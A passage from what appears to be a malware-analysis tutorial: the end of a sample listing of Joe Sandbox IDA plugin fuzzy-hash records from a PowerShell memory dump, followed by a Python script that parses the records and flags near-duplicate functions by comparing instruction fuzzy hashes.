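Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
• Instruction ID: 59679e0dbbaa582bf65157c9f2be697c0ecd99dfd55d1364643391f7701e1671
• Opcode Fuzzy Hash: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
• Instruction Fuzzy Hash: 7C019272B0CA180BE758994C78561BCB3D1E79A621F05023FE18EC3286DE69A8035286
Memory Dump Source
• Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
• Instruction ID: 6e8e90b878b8f591fd7fab9b6867498902cfc9b97a3a0d2a42dc112b06612460
• Opcode Fuzzy Hash: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
• Instruction Fuzzy Hash: FE019672B0CA180BE75C594C74521BC73D1E79A721F05027FE58EC3286DE5968435186
"""

# "<pid-hex>.<...>.sdmp, Offset: <base-hex>, based on PE: ..."
SOURCE_RE = re.compile(r"^([0-9A-Fa-f]{8})\.\S+?\.sdmp, Offset: ([0-9A-Fa-f]+)")
BULLET_RE = re.compile(r"^[•*-]?\s*([^:]+):\s*(.*)$")


@dataclass
class FunctionRecord:
    pid: int = -1            # from the leading 8 hex digits of the .sdmp name
    base: int = -1           # dump base address, from "Offset:"
    snapshot: str = ""       # IDA plugin snapshot file
    attrs: dict = field(default_factory=dict)   # the "Similarity" bullets

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.attrs.get("Instruction Fuzzy Hash", "")


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing at each 'Memory Dump Source' line and collect bullets."""
    records: list[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or line in ("", "Joe Sandbox IDA Plugin", "Similarity"):
            continue
        m = BULLET_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            sm = SOURCE_RE.match(value)
            if sm:
                current.pid = int(sm.group(1), 16)
                current.base = int(sm.group(2), 16)
        elif key == "Snapshot File":
            current.snapshot = value
        else:
            current.attrs[key] = value   # empty API/String IDs stay ""
    return records


def positional_similarity(a: str, b: str) -> float:
    """Fraction of hex positions that agree. Assumed heuristic: the page does not
    document the fuzzy-hash format, so this only spots near-identical strings."""
    if not a or not b or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def near_duplicates(records: list[FunctionRecord], threshold: float = 0.75):
    """Pairs of records whose instruction fuzzy hashes agree at >= threshold."""
    hits = []
    for r1, r2 in combinations(records, 2):
        s = positional_similarity(r1.instruction_fuzzy_hash, r2.instruction_fuzzy_hash)
        if s >= threshold:
            hits.append((r1.snapshot, r1.attrs["Instruction ID"],
                         r2.snapshot, r2.attrs["Instruction ID"], s))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(f"pid={r.pid} base={r.base:#x} {r.snapshot} ifh={r.instruction_fuzzy_hash[:16]}...")
    for hit in near_duplicates(recs):
        print("near-duplicate:", hit)
```

Run against the three sample records, the two functions from the 00007FFD344D0000 dump of PID 16 agree at 55 of 70 hex positions and are reported as a pair, while the PID 14 function is far below the threshold. The threshold is a knob, not a verdict: treat a hit as a prompt to diff the two functions in the snapshot, not as proof they are the same code.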